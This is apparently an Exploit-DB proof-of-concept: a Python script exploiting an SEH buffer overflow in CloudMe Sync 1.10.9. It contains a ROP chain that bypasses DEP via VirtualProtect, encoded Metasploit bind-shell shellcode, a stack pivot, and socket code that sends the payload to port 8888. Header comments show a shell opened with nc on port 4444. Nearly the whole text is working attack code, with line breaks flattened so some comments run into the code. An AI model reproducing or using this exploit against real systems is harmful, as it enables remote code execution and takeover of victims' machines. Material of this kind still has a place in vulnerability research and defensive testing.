# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) # Date: 2018-05-27 # Author: Juan Prescotto # Tested Against: Win7 Pro SP1 64 bit # Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe # Tested Against Version: 1.10.9 # Special Thanks to my wife for allowing me spend countless hours on this passion of mine # Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/) # for his work on the original exploit # Bad Characers: \x00 # SEH Offset: 2236 # Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll # Victim Machine: # C:\>netstat -nao | find "8888" # TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 2640 # C:\>tasklist | find "2640" # CloudMe.exe 2640 Console 1 36,632 K # Attacking Machine: # root@kali:~/Desktop# python cloudme.py # CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass # [+] CloudMe Target IP> 192.168.12.4 # Sending buffer overflow to CloudMe Service # Target Should be Running a Bind Shell on Port 4444! # root@kali:~/Desktop# nc -nv 192.168.12.4 4444 # (UNKNOWN) [192.168.12.4] 4444 (?) open # Microsoft Windows [Version 6.1.7601] # Copyright (c) 2009 Microsoft Corporation. All rights reserved. # C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe> # My register setup when VirtualProtect() is called (Defeat DEP) : -- # EAX = NOP (0x90909090) # ECX = lpOldProtect (ptr to W address) # EDX = NewProtect (0x40) # EBX = dwSize # ESP = lPAddress (automatic) # EBP = ReturnTo (ptr to jmp esp) # ESI = ptr to VirtualProtect() # EDI = ROP NOP (RETN) #!/usr/bin/python import socket,struct print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass' def create_rop_chain(): rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x61d1e7fe, POP ECX RETN [Qt5Gui.dll] 0x690398a8, ptr to &VirtualProtect() [IAT Qt5Core.dll] 0x6fe70610, MOV EAX,DWORD PTR DS:[ECX] RETN [libstdc++-6.dll] 0x61c40a6f, XCHG EAX,ESI RETN [Qt5Gui.dll] 0x68c8ea5a, POP EBP RETN [Qt5Core.dll] 0x68d652e1, & call esp [Qt5Core.dll] 0x68fa7ca2, POP EDX RETN [Qt5Core.dll] 0xfffffdff, Value to negate, will become 0x00000201 0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll] 0x68d52747, POP EBX RETN [Qt5Core.dll] 0xffffffff, 0x68f948bc, INC EBX RETN [Qt5Core.dll] 0x68f8063c, ADD EBX,EDX ADD AL,0A RETN [Qt5Core.dll] 0x68f9a472, POP EDX RETN [Qt5Core.dll] 0xffffffc0, Value to negate, will become 0x00000040 0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll] 0x61f057ab, POP ECX RETN [Qt5Gui.dll] 0x6eb5efa3, &Writable location [libgcc_s_dw2-1.dll] 0x61dc14d1, POP EDI RETN [Qt5Gui.dll] 0x64b4ed0c, RETN (ROP NOP) [libwinpthread-1.dll] 0x61ba6245, POP EAX RETN [Qt5Gui.dll] 0x90909090, nop 0x61b45ea3, PUSHAD RETN [Qt5Gui.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #msf payload(shell_bind_tcp) > show options #Module options (payload/windows/shell_bind_tcp): # Name Current Setting Required Description # EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) # LPORT 4444 yes The listen port # RHOST no The target address #msf payload(shell_bind_tcp) > generate -b '\x00' -t py # windows/shell_bind_tcp - 355 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai shellcode = "" shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33" shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99" shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94" shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb" shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18" shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c" shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2" shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed" shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a" shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a" shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27" shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d" shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac" shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34" shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8" shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d" shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38" shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f" shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b" shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69" shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9" shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2" shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26" shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf" shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed" shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4" shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7" shellcode += "\xb0\x5d\xf0\x2d" ip=raw_input('[+] CloudMe Target IP> ') stack_pivot=struct.pack('<L',0x61d95f58) {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) : SUB ESP,8 ADD ESP,0D8C POP EBX POP ESI POP EDI POP EBP RETN 0x08 ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ} rop_nop1=struct.pack('<L',0x68b1a714) * 300 RETN 0x10 ** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ} rop_nop2=struct.pack('<L',0x61c6fc53) * 50 RETN ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ} nop = "\x90" * 20 payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode)) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip,8888)) s.send(payload) print 'Sending buffer overflow to CloudMe Service' print 'Target Should be Running a Bind Shell on Port 4444!'